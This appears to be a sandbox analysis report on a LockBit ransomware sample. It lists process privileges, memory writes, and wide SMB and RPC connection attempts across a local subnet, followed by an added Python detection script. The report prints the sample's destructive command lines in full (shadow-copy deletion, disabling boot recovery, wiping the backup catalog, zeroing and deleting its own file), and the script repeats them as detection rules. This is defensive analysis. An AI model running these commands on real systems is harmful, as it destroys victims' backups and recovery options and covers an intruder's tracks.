Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2712 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 2712 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 2712 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 2712 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 2020 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2020 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2020 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2020 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2020 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2020 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2020 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2712 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 2712 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 2712 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 2712 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 2712 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 2060 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 2060 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 2060 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
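The two cmd.exe command lines above carry the whole of this sample's recovery-inhibition and clean-up logic. The first deletes shadow copies twice over (vssadmin, then WMI), turns off boot-failure recovery and the recovery environment through bcdedit, and wipes the Windows Backup catalog. The second waits on a short ping loop so the parent can exit, overwrites the first 512 KiB (524288 bytes) of the dropper with zeros via fsutil setZeroData, and deletes it. The detection below is an added example written for this report, not part of the sandbox output or of the sample: it splits each process command line on the cmd.exe separators and matches one command at a time, so a rule cannot be satisfied by two unrelated commands joined with `&`, and it only reports a self-delete when the zeroed or deleted path is the parent process image, so an ordinary `del` does not fire. The telemetry is constructed from the process list and the WriteProcessMemory pids shown above; the sample's own parent pid, the benign control row and the ATT&CK technique chosen for each rule are the example's assumptions.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    pid: int
    technique: str  # MITRE ATT&CK technique ID (the mapping is this example's own)
    rule: str
    detail: str


# Constructed telemetry (Sysmon-style process-creation records) built from the
# process list and WriteProcessMemory pids in this report. The sample's parent
# pid (1000) and the benign control row (pid 3100) are assumptions.
SAMPLE_EVENTS = [
    {"pid": 2712, "ppid": 1000,
     "image": r"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"'},
    {"pid": 2020, "ppid": 2712, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete '
                r'& bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no '
                r'& wbadmin delete catalog -quiet'},
    {"pid": 2052, "ppid": 2712, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r'"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta"'},
    {"pid": 2060, "ppid": 2712, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul '
                r'& fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" '
                r'& Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"'},
    # Benign control (constructed): an administrator listing shadow copies must not fire.
    {"pid": 3100, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c vssadmin list shadows'},
]

# T1490 (Inhibit System Recovery) rules. Each regex is tried against ONE command
# segment, so it cannot be satisfied by two unrelated commands joined by '&'.
RECOVERY_RULES = [
    ("vssadmin delete shadows", re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("wmic shadowcopy delete", re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("bcdedit bootstatuspolicy ignoreallfailures",
     re.compile(r"\bbcdedit(?:\.exe)?\s+/set\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I)),
    ("bcdedit recoveryenabled no", re.compile(r"\bbcdedit(?:\.exe)?\s+/set\b.*\brecoveryenabled\s+no\b", re.I)),
    ("wbadmin delete catalog", re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I)),
]
PING_DELAY = re.compile(r"\bping(?:\.exe)?\s+\S+\s+-n\s+\d+", re.I)
FSUTIL_ZERO = re.compile(r'\bfsutil(?:\.exe)?\s+file\s+setzerodata\b.*?"([^"]+)"', re.I)  # quoted paths only
DEL_FILE = re.compile(r'\b(?:del|erase)\b.*?"([^"]+)"', re.I)
MSHTA_HTA = re.compile(r'\bmshta(?:\.exe)?"?\s+"?([^"\s]+\.hta)', re.I)


def segments(cmdline):
    """Split a cmd.exe command line on its command separators (&, &&, ||)."""
    return [s.strip() for s in re.split(r"\s*(?:&&|\|\||&)\s*", cmdline) if s.strip()]


def analyze(events):
    """Return Findings for recovery inhibition, self-deletion and mshta note display."""
    image_by_pid = {e["pid"]: e["image"].lower() for e in events}
    findings = []
    for ev in events:
        segs = segments(ev["cmdline"])
        for name, rx in RECOVERY_RULES:
            if any(rx.search(s) for s in segs):
                findings.append(Finding(ev["pid"], "T1490", name, ev["image"]))
        # Self-deletion: the child zeroes and/or deletes its parent's own image,
        # usually after a ping-based sleep so the parent has already exited.
        targets = set()
        for s in segs:
            for rx in (FSUTIL_ZERO, DEL_FILE):
                m = rx.search(s)
                if m:
                    targets.add(m.group(1).lower())
        parent = image_by_pid.get(ev["ppid"])
        if parent and parent in targets:
            delayed = any(PING_DELAY.search(s) for s in segs)
            findings.append(Finding(ev["pid"], "T1070.004", "self-delete of parent image",
                                    f"delayed={delayed} target={parent}"))
        # mshta rendering an .hta from a user-writable path (the ransom note here).
        for s in segs:
            m = MSHTA_HTA.search(s)
            if m and m.group(1).lower().startswith("c:\\users\\"):
                findings.append(Finding(ev["pid"], "T1218.005", "mshta .hta from user profile", m.group(1)))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"pid={f.pid:<5} {f.technique:<10} {f.rule}: {f.detail}")
```

Each T1490 rule is reported at most once per process, so the chain above yields exactly five T1490 findings for pid 2020, one T1070.004 finding for pid 2060 (with delayed=True because of the ping loop) and one T1218.005 finding for pid 2052, while the `vssadmin list shadows` control produces nothing. Unquoted paths in fsutil/del are deliberately not parsed; extend the two capture regexes if your telemetry normalises quoting.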

Network

Country Destination Domain Proto
N/A 10.127.1.229:445 tcp
N/A 10.127.1.214:445 tcp
N/A 10.127.1.199:445 tcp
N/A 10.127.1.237:445 tcp
N/A 10.127.1.234:445 tcp
N/A 10.127.1.244:445 tcp
N/A 10.127.1.193:445 tcp
N/A 10.127.1.247:445 tcp
N/A 10.127.1.235:445 tcp
N/A 10.127.1.206:445 tcp
N/A 10.127.1.219:445 tcp
N/A 10.127.1.205:445 tcp
N/A 10.127.1.212:445 tcp
N/A 10.127.1.195:445 tcp
N/A 10.127.1.187:445 tcp
N/A 10.127.1.192:445 tcp
N/A 10.127.1.254:445 tcp
N/A 10.127.1.238:445 tcp
N/A 10.127.1.190:445 tcp
N/A 10.127.1.240:445 tcp
N/A 10.127.1.236:445 tcp
N/A 10.127.1.221:445 tcp
N/A 10.127.1.227:445 tcp
N/A 10.127.1.181:445 tcp
N/A 10.127.1.250:445 tcp
N/A 10.127.1.211:445 tcp
N/A 10.127.1.196:445 tcp
N/A 10.127.1.220:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.245:445 tcp
N/A 10.127.1.230:445 tcp
N/A 10.127.1.202:445 tcp
N/A 10.127.1.225:445 tcp
N/A 10.127.1.204:445 tcp
N/A 10.127.1.228:445 tcp
N/A 10.127.1.222:445 tcp
N/A 10.127.1.183:445 tcp
N/A 10.127.1.246:445 tcp
N/A 10.127.1.210:445 tcp
N/A 10.127.1.243:445 tcp
N/A 10.127.1.216:445 tcp
N/A 10.127.1.201:445 tcp
N/A 10.127.1.191:445 tcp
N/A 10.127.1.197:445 tcp
N/A 10.127.1.200:445 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.242:445 tcp
N/A 10.127.1.252:445 tcp
N/A 10.127.1.198:445 tcp
N/A 10.127.1.194:445 tcp
N/A 10.127.1.251:445 tcp
N/A 10.127.1.241:445 tcp
N/A 10.127.1.239:445 tcp
N/A 10.127.1.217:445 tcp
N/A 10.127.1.77:445 tcp
N/A 10.127.1.231:445 tcp
N/A 10.127.1.188:445 tcp
N/A 10.127.1.223:445 tcp
N/A 10.127.1.226:445 tcp
N/A 10.127.1.189:445 tcp
N/A 10.127.1.135:445 tcp
N/A 10.127.1.249:445 tcp
N/A 10.127.1.233:445 tcp
N/A 10.127.1.208:445 tcp
N/A 10.127.1.232:445 tcp
N/A 10.127.1.182:445 tcp
N/A 10.127.1.253:445 tcp
N/A 10.127.1.209:445 tcp
N/A 10.127.1.218:445 tcp
N/A 10.127.1.207:445 tcp
N/A 10.127.1.248:445 tcp
N/A 10.127.1.224:445 tcp
N/A 10.127.1.213:445 tcp
N/A 10.127.1.142:445 tcp
N/A 10.127.1.185:445 tcp
N/A 10.127.1.215:445 tcp
N/A 10.127.1.203:445 tcp
N/A 10.127.1.164:445 tcp
N/A 10.127.1.152:445 tcp
N/A 10.127.1.146:445 tcp
N/A 10.127.1.138:445 tcp
N/A 10.127.1.136:445 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.149:445 tcp
N/A 10.127.1.154:445 tcp
N/A 10.127.1.174:445 tcp
N/A 10.127.1.180:445 tcp
N/A 10.127.1.171:445 tcp
N/A 10.127.1.132:445 tcp
N/A 10.127.1.184:445 tcp
N/A 10.127.1.173:445 tcp
N/A 10.127.1.169:445 tcp
N/A 10.127.1.163:445 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.167:445 tcp
N/A 10.127.1.160:445 tcp
N/A 10.127.1.145:445 tcp
N/A 10.127.1.141:445 tcp
N/A 10.127.1.161:445 tcp
N/A 10.127.1.134:445 tcp
N/A 10.127.1.156:445 tcp
N/A 10.127.1.151:445 tcp
N/A 10.127.1.131:445 tcp
N/A 10.127.1.178:445 tcp
N/A 10.127.1.175:445 tcp
N/A 10.127.1.143:445 tcp
N/A 10.127.1.168:445 tcp
N/A 10.127.1.147:445 tcp
N/A 10.127.1.155:445 tcp
N/A 10.127.1.148:445 tcp
N/A 10.127.1.158:445 tcp
N/A 10.127.1.159:445 tcp
N/A 10.127.1.157:445 tcp
N/A 10.127.1.144:445 tcp
N/A 10.127.1.130:445 tcp
N/A 10.127.1.176:445 tcp
N/A 10.127.1.162:445 tcp
N/A 10.127.1.153:445 tcp
N/A 10.127.1.186:445 tcp
N/A 10.127.1.179:445 tcp
N/A 10.127.1.166:445 tcp
N/A 10.127.1.137:445 tcp
N/A 10.127.1.177:445 tcp
N/A 10.127.1.139:445 tcp
N/A 10.127.1.165:445 tcp
N/A 10.127.1.170:445 tcp
N/A 10.127.1.133:445 tcp
N/A 10.127.1.150:445 tcp
N/A 10.127.1.140:445 tcp
N/A 10.127.1.172:445 tcp
N/A 10.127.1.84:445 tcp
N/A 10.127.1.81:445 tcp
N/A 10.127.1.94:445 tcp
N/A 10.127.1.98:445 tcp
N/A 10.127.1.72:445 tcp
N/A 10.127.1.69:445 tcp
N/A 10.127.1.112:445 tcp
N/A 10.127.1.110:445 tcp
N/A 10.127.1.79:445 tcp
N/A 10.127.1.92:445 tcp
N/A 10.127.1.111:445 tcp
N/A 10.127.1.67:445 tcp
N/A 10.127.1.76:445 tcp
N/A 10.127.1.104:445 tcp
N/A 10.127.1.78:445 tcp
N/A 10.127.1.123:445 tcp
N/A 10.127.1.88:445 tcp
N/A 10.127.1.89:445 tcp
N/A 10.127.1.119:445 tcp
N/A 10.127.1.102:445 tcp
N/A 10.127.1.125:445 tcp
N/A 10.127.1.114:445 tcp
N/A 10.127.1.66:445 tcp
N/A 10.127.1.65:445 tcp
N/A 10.127.1.93:445 tcp
N/A 10.127.1.106:445 tcp
N/A 10.127.1.99:445 tcp
N/A 10.127.1.129:445 tcp
N/A 10.127.1.124:445 tcp
N/A 10.127.1.122:445 tcp
N/A 10.127.1.117:445 tcp
N/A 10.127.1.101:445 tcp
N/A 10.127.1.108:445 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.90:445 tcp
N/A 10.127.1.68:445 tcp
N/A 10.127.1.126:445 tcp
N/A 10.127.1.91:445 tcp
N/A 10.127.1.97:445 tcp
N/A 10.127.1.82:445 tcp
N/A 10.127.1.115:445 tcp
N/A 10.127.1.75:445 tcp
N/A 10.127.1.73:445 tcp
N/A 10.127.1.71:445 tcp
N/A 10.127.1.128:445 tcp
N/A 10.127.1.121:445 tcp
N/A 10.127.1.80:445 tcp
N/A 10.127.1.100:445 tcp
N/A 10.127.1.118:445 tcp
N/A 10.127.1.74:445 tcp
N/A 10.127.1.103:445 tcp
N/A 10.127.1.85:445 tcp
N/A 10.127.1.83:445 tcp
N/A 10.127.1.127:445 tcp
N/A 10.127.1.107:445 tcp
N/A 10.127.1.70:445 tcp
N/A 10.127.1.86:445 tcp
N/A 10.127.1.120:445 tcp
N/A 10.127.1.113:445 tcp
N/A 10.127.1.105:445 tcp
N/A 10.127.1.95:445 tcp
N/A 10.127.1.116:445 tcp
N/A 10.127.1.109:445 tcp
N/A 10.127.1.96:445 tcp
N/A 10.127.1.87:445 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.59:445 tcp
N/A 10.127.1.46:445 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.0:445 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.52:445 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.38:445 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.25:445 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.50:445 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.254:135 tcp
N/A 10.127.1.243:135 tcp
N/A 10.127.1.234:135 tcp
N/A 10.127.1.235:135 tcp
N/A 10.127.1.237:135 tcp
N/A 10.127.1.236:135 tcp
N/A 10.127.1.240:135 tcp
N/A 10.127.1.238:135 tcp
N/A 10.127.1.241:135 tcp
N/A 10.127.1.239:135 tcp
N/A 10.127.1.229:135 tcp
N/A 10.127.1.230:135 tcp
N/A 10.127.1.231:135 tcp
N/A 10.127.1.232:135 tcp
N/A 10.127.1.233:135 tcp
N/A 10.127.1.245:135 tcp
N/A 10.127.1.246:135 tcp
N/A 10.127.1.253:135 tcp
N/A 10.127.1.244:135 tcp
N/A 10.127.1.247:135 tcp
N/A 10.127.1.242:135 tcp
N/A 10.127.1.249:135 tcp
N/A 10.127.1.250:135 tcp
N/A 10.127.1.251:135 tcp
N/A 10.127.1.248:135 tcp
N/A 10.127.1.252:135 tcp
N/A 10.127.1.199:135 tcp
N/A 10.127.1.210:135 tcp
N/A 10.127.1.211:135 tcp
N/A 10.127.1.200:135 tcp
N/A 10.127.1.212:135 tcp
N/A 10.127.1.213:135 tcp
N/A 10.127.1.214:135 tcp
N/A 10.127.1.215:135 tcp
N/A 10.127.1.216:135 tcp
N/A 10.127.1.217:135 tcp
N/A 10.127.1.218:135 tcp
N/A 10.127.1.219:135 tcp
N/A 10.127.1.201:135 tcp
N/A 10.127.1.202:135 tcp
N/A 10.127.1.203:135 tcp
N/A 10.127.1.204:135 tcp
N/A 10.127.1.205:135 tcp
N/A 10.127.1.209:135 tcp
N/A 10.127.1.227:135 tcp
N/A 10.127.1.228:135 tcp
N/A 10.127.1.220:135 tcp
N/A 10.127.1.221:135 tcp
N/A 10.127.1.222:135 tcp
N/A 10.127.1.223:135 tcp
N/A 10.127.1.224:135 tcp
N/A 10.127.1.225:135 tcp
N/A 10.127.1.206:135 tcp
N/A 10.127.1.188:135 tcp
N/A 10.127.1.189:135 tcp
N/A 10.127.1.193:135 tcp
N/A 10.127.1.194:135 tcp
N/A 10.127.1.195:135 tcp
N/A 10.127.1.196:135 tcp
N/A 10.127.1.197:135 tcp
N/A 10.127.1.198:135 tcp
N/A 10.127.1.184:135 tcp
N/A 10.127.1.190:135 tcp
N/A 10.127.1.186:135 tcp
N/A 10.127.1.191:135 tcp
N/A 10.127.1.192:135 tcp
N/A 10.127.1.207:135 tcp
N/A 10.127.1.208:135 tcp
N/A 10.127.1.182:135 tcp
N/A 10.127.1.226:135 tcp
N/A 10.127.1.185:135 tcp
N/A 10.127.1.187:135 tcp
N/A 10.127.1.181:135 tcp
N/A 10.127.1.183:135 tcp
N/A 10.127.1.180:135 tcp
N/A 10.127.1.179:135 tcp
N/A 10.127.1.177:135 tcp
N/A 10.127.1.172:135 tcp
N/A 10.127.1.178:135 tcp
N/A 10.127.1.171:135 tcp
N/A 10.127.1.176:135 tcp
N/A 10.127.1.175:135 tcp
N/A 10.127.1.174:135 tcp
N/A 10.127.1.173:135 tcp
N/A 10.127.1.168:135 tcp
N/A 10.127.1.170:135 tcp
N/A 10.127.1.169:135 tcp
N/A 10.127.1.166:135 tcp
N/A 10.127.1.165:135 tcp
N/A 10.127.1.164:135 tcp
N/A 10.127.1.163:135 tcp
N/A 10.127.1.162:135 tcp
N/A 10.127.1.167:135 tcp
N/A 10.127.1.161:135 tcp
N/A 10.127.1.160:135 tcp
N/A 10.127.1.159:135 tcp
N/A 10.127.1.158:135 tcp
N/A 10.127.1.157:135 tcp
N/A 10.127.1.156:135 tcp
N/A 10.127.1.155:135 tcp
N/A 10.127.1.154:135 tcp
N/A 10.127.1.143:135 tcp
N/A 10.127.1.142:135 tcp
N/A 10.127.1.141:135 tcp
N/A 10.127.1.140:135 tcp
N/A 10.127.1.139:135 tcp
N/A 10.127.1.137:135 tcp
N/A 10.127.1.118:135 tcp
N/A 10.127.1.153:135 tcp
N/A 10.127.1.123:135 tcp
N/A 10.127.1.124:135 tcp
N/A 10.127.1.125:135 tcp
N/A 10.127.1.126:135 tcp
N/A 10.127.1.151:135 tcp
N/A 10.127.1.150:135 tcp
N/A 10.127.1.149:135 tcp
N/A 10.127.1.148:135 tcp
N/A 10.127.1.147:135 tcp
N/A 10.127.1.146:135 tcp
N/A 10.127.1.145:135 tcp
N/A 10.127.1.144:135 tcp
N/A 10.127.1.138:135 tcp
N/A 10.127.1.152:135 tcp
N/A 10.127.1.136:135 tcp
N/A 10.127.1.135:135 tcp
N/A 10.127.1.134:135 tcp
N/A 10.127.1.133:135 tcp
N/A 10.127.1.132:135 tcp
N/A 10.127.1.131:135 tcp
N/A 10.127.1.130:135 tcp
N/A 10.127.1.129:135 tcp
N/A 10.127.1.128:135 tcp
N/A 10.127.1.119:135 tcp
N/A 10.127.1.120:135 tcp
N/A 10.127.1.121:135 tcp
N/A 10.127.1.127:135 tcp
N/A 10.127.1.105:135 tcp
